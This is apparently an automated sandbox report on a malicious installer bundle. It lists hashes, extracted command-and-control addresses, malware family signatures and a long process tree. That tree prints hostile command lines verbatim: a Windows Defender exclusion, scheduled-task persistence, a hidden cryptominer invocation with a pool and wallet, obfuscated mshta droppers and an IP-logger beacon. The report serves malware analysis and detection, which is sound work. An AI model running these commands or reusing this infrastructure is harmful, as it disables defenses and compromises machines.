Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Analysis

  • max time kernel
    1395s
  • max time network
    2231s
  • platform
    windows10_x64
  • resource
    win10-de
  • submitted
    16-09-2021 21:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    6.5MB

  • MD5

    064f0d6900675bed580da1291a566cfa

  • SHA1

    f81699a68c901d190842de735dbda28a3fb52292

  • SHA256

    7ec88d4baa0a97362a026cf6e0f46422379a99be6d9bfe19034152f3d47cc0ed

  • SHA512

    41dc5c444afd6b5dc0947cf9950acb5aa1081ee9921c748195325b5cfcb23532cea1802959baa59a0c41ed998ba20b509ec107da882d5d8b3bf0b1d17f892738

Score
10/10
djvugluptebametasploitnetsupportredlinesmokeloadersocelarstofseevidarzloaderanimedianewaspackv2backdoorbotnetdiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealertrojanvmprotect

Malware Config

Extracted

Family

redline

Botnet

medianew

C2

91.121.67.60:62102

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

    trojanbotnetzloader
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 54 IoCs
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 15 IoCs
    evasiontrojan
  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 20 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 39 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 27 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 6 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 11 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • NTFS ADS 2 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2616
      • C:\Windows\system32\wbem\WMIADAP.EXE
        wmiadap.exe /F /T /R
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:7540
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:3064
      • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4880
        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4920
          • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\setup_install.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\setup_install.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:5032
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4160
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3552
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Thu20c467678e2c.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4176
              • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20c467678e2c.exe
                Thu20c467678e2c.exe
                6⤵
                • Executes dropped EXE
                PID:3972
                • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4104
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                    8⤵
                      PID:6524
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                        9⤵
                        • Creates scheduled task(s)
                        PID:6952
                    • C:\Users\Admin\AppData\Roaming\services64.exe
                      "C:\Users\Admin\AppData\Roaming\services64.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:7004
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                        9⤵
                          PID:5592
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                            10⤵
                            • Creates scheduled task(s)
                            PID:2768
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                          9⤵
                            PID:8964
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                            9⤵
                              PID:6764
                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:896
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 808
                            8⤵
                            • Program crash
                            PID:3496
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 828
                            8⤵
                            • Program crash
                            PID:1248
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 896
                            8⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:508
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1020
                            8⤵
                            • Executes dropped EXE
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4372
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1088
                            8⤵
                            • Program crash
                            PID:4692
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1076
                            8⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1248
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1036
                            8⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            • Program crash
                            PID:5092
                        • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                          "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1352
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 1348
                            8⤵
                            • Program crash
                            PID:5604
                        • C:\Users\Admin\AppData\Local\Temp\2.exe
                          "C:\Users\Admin\AppData\Local\Temp\2.exe"
                          7⤵
                            PID:4372
                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:1044
                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                9⤵
                                • Modifies data under HKEY_USERS
                                PID:15800
                          • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                            "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3844
                            • C:\ProgramData\4873306.exe
                              "C:\ProgramData\4873306.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3860
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 3860 -s 1768
                                9⤵
                                • Program crash
                                PID:5556
                            • C:\ProgramData\6650495.exe
                              "C:\ProgramData\6650495.exe"
                              8⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:1872
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Thu20f2cf5e0c.exe
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3752
                        • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20f2cf5e0c.exe
                          Thu20f2cf5e0c.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3048
                          • C:\Users\Admin\AppData\Roaming\8684174.scr
                            "C:\Users\Admin\AppData\Roaming\8684174.scr" /S
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4956
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 4956 -s 1768
                              8⤵
                              • Program crash
                              PID:5228
                          • C:\Users\Admin\AppData\Roaming\8337894.scr
                            "C:\Users\Admin\AppData\Roaming\8337894.scr" /S
                            7⤵
                            • Executes dropped EXE
                            PID:6136
                          • C:\Users\Admin\AppData\Roaming\5581443.scr
                            "C:\Users\Admin\AppData\Roaming\5581443.scr" /S
                            7⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:1968
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Thu20dae7c52bc0856.exe
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3348
                        • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20dae7c52bc0856.exe
                          Thu20dae7c52bc0856.exe
                          6⤵
                          • Executes dropped EXE
                          PID:312
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Thu20a5f7ccaa78.exe
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3472
                        • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
                          Thu20a5f7ccaa78.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:420
                          • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
                            C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
                            7⤵
                            • Executes dropped EXE
                            PID:524
                          • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
                            C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
                            7⤵
                            • Executes dropped EXE
                            PID:2364
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Thu203b503b429e68.exe
                        5⤵
                          PID:3524
                          • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203b503b429e68.exe
                            Thu203b503b429e68.exe
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4512
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c taskkill /f /im chrome.exe
                              7⤵
                                PID:5532
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im chrome.exe
                                  8⤵
                                  • Kills process with taskkill
                                  PID:6096
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Thu2094524d5e5b.exe
                            5⤵
                              PID:4220
                              • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2094524d5e5b.exe
                                Thu2094524d5e5b.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:4404
                                • C:\Users\Admin\Documents\72HVEuHc1LiCdlGyE_KhQi1n.exe
                                  "C:\Users\Admin\Documents\72HVEuHc1LiCdlGyE_KhQi1n.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3924
                                • C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                                  "C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:7252
                                  • C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                                    C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                                    8⤵
                                      PID:8404
                                    • C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                                      C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                                      8⤵
                                        PID:8624
                                    • C:\Users\Admin\Documents\0IuDRAJglDutmXwQOEhSBXDa.exe
                                      "C:\Users\Admin\Documents\0IuDRAJglDutmXwQOEhSBXDa.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:7288
                                    • C:\Users\Admin\Documents\Gn9Jky4_EDbOI58YpznCytCC.exe
                                      "C:\Users\Admin\Documents\Gn9Jky4_EDbOI58YpznCytCC.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:7316
                                    • C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe
                                      "C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Loads dropped DLL
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:7388
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe"
                                        8⤵
                                          PID:9868
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            9⤵
                                            • Delays execution with timeout.exe
                                            PID:9484
                                      • C:\Users\Admin\Documents\a3nSYK3QiDj60t0XJFF7UlrQ.exe
                                        "C:\Users\Admin\Documents\a3nSYK3QiDj60t0XJFF7UlrQ.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of SetWindowsHookEx
                                        PID:7308
                                      • C:\Users\Admin\Documents\tH0ctc2jiXFQrqD_hc1dkUzk.exe
                                        "C:\Users\Admin\Documents\tH0ctc2jiXFQrqD_hc1dkUzk.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:7408
                                      • C:\Users\Admin\Documents\3j37Icfa8ZkdKtGcGgFo5hHI.exe
                                        "C:\Users\Admin\Documents\3j37Icfa8ZkdKtGcGgFo5hHI.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:7452
                                      • C:\Users\Admin\Documents\EWtGNadfMrzbtpsBi9aWUtQT.exe
                                        "C:\Users\Admin\Documents\EWtGNadfMrzbtpsBi9aWUtQT.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:7584
                                      • C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                                        "C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:7576
                                        • C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                                          C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                                          8⤵
                                          • Suspicious use of SetThreadContext
                                          PID:9168
                                          • C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                                            C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                                            9⤵
                                              PID:6200
                                        • C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe
                                          "C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:7708
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )
                                            8⤵
                                              PID:8520
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF ""== "" for %w In ( "C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe" ) do taskkill /F -iM "%~nxw"
                                                9⤵
                                                  PID:8372
                                                  • C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe
                                                    Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj
                                                    10⤵
                                                      PID:8424
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )
                                                        11⤵
                                                          PID:6668
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ( "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"
                                                            12⤵
                                                              PID:9556
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ
                                                            11⤵
                                                            • Loads dropped DLL
                                                            PID:9432
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F -iM "usyw5ZngVKxU1DoBnfAsyAxL.exe"
                                                          10⤵
                                                          • Kills process with taskkill
                                                          PID:8644
                                                  • C:\Users\Admin\Documents\2rrWk6aWyhXCRt7PpjtUduKG.exe
                                                    "C:\Users\Admin\Documents\2rrWk6aWyhXCRt7PpjtUduKG.exe"
                                                    7⤵
                                                      PID:7900
                                                    • C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe
                                                      "C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"
                                                      7⤵
                                                        PID:7892
                                                        • C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe
                                                          "C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"
                                                          8⤵
                                                          • Modifies data under HKEY_USERS
                                                          PID:16672
                                                      • C:\Users\Admin\Documents\AYcoRdCUFo3EVft6taKBoNmp.exe
                                                        "C:\Users\Admin\Documents\AYcoRdCUFo3EVft6taKBoNmp.exe"
                                                        7⤵
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:7884
                                                      • C:\Users\Admin\Documents\kgFoGuhcdrrxNuBNV0pnzt35.exe
                                                        "C:\Users\Admin\Documents\kgFoGuhcdrrxNuBNV0pnzt35.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:7872
                                                      • C:\Users\Admin\Documents\RukWAObiV_pk8jgtTfDBZo9L.exe
                                                        "C:\Users\Admin\Documents\RukWAObiV_pk8jgtTfDBZo9L.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:7864
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"
                                                          8⤵
                                                            PID:6352
                                                            • C:\Users\Admin\AppData\Local\Temp\wwi.exe
                                                              "wwi.exe"
                                                              9⤵
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:8920
                                                            • C:\Users\Admin\AppData\Local\Temp\wwl.exe
                                                              "wwl.exe"
                                                              9⤵
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:9036
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"
                                                              9⤵
                                                              • Blocklisted process makes network request
                                                              PID:9184
                                                        • C:\Users\Admin\Documents\wVv8AImVlR_dbDz6BgqJ11oz.exe
                                                          "C:\Users\Admin\Documents\wVv8AImVlR_dbDz6BgqJ11oz.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:7856
                                                        • C:\Users\Admin\Documents\yT0Jr6qhYrzdROOogtndOL8l.exe
                                                          "C:\Users\Admin\Documents\yT0Jr6qhYrzdROOogtndOL8l.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:7848
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            8⤵
                                                              PID:9832
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                9⤵
                                                                • Kills process with taskkill
                                                                PID:11216
                                                          • C:\Users\Admin\Documents\ItAFNrv2sOXUt7aWaBN3nK6S.exe
                                                            "C:\Users\Admin\Documents\ItAFNrv2sOXUt7aWaBN3nK6S.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:7840
                                                          • C:\Users\Admin\Documents\XgjnLxbzwVfuidtVtZ1khfTK.exe
                                                            "C:\Users\Admin\Documents\XgjnLxbzwVfuidtVtZ1khfTK.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:7832
                                                            • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                              8⤵
                                                                PID:8672
                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
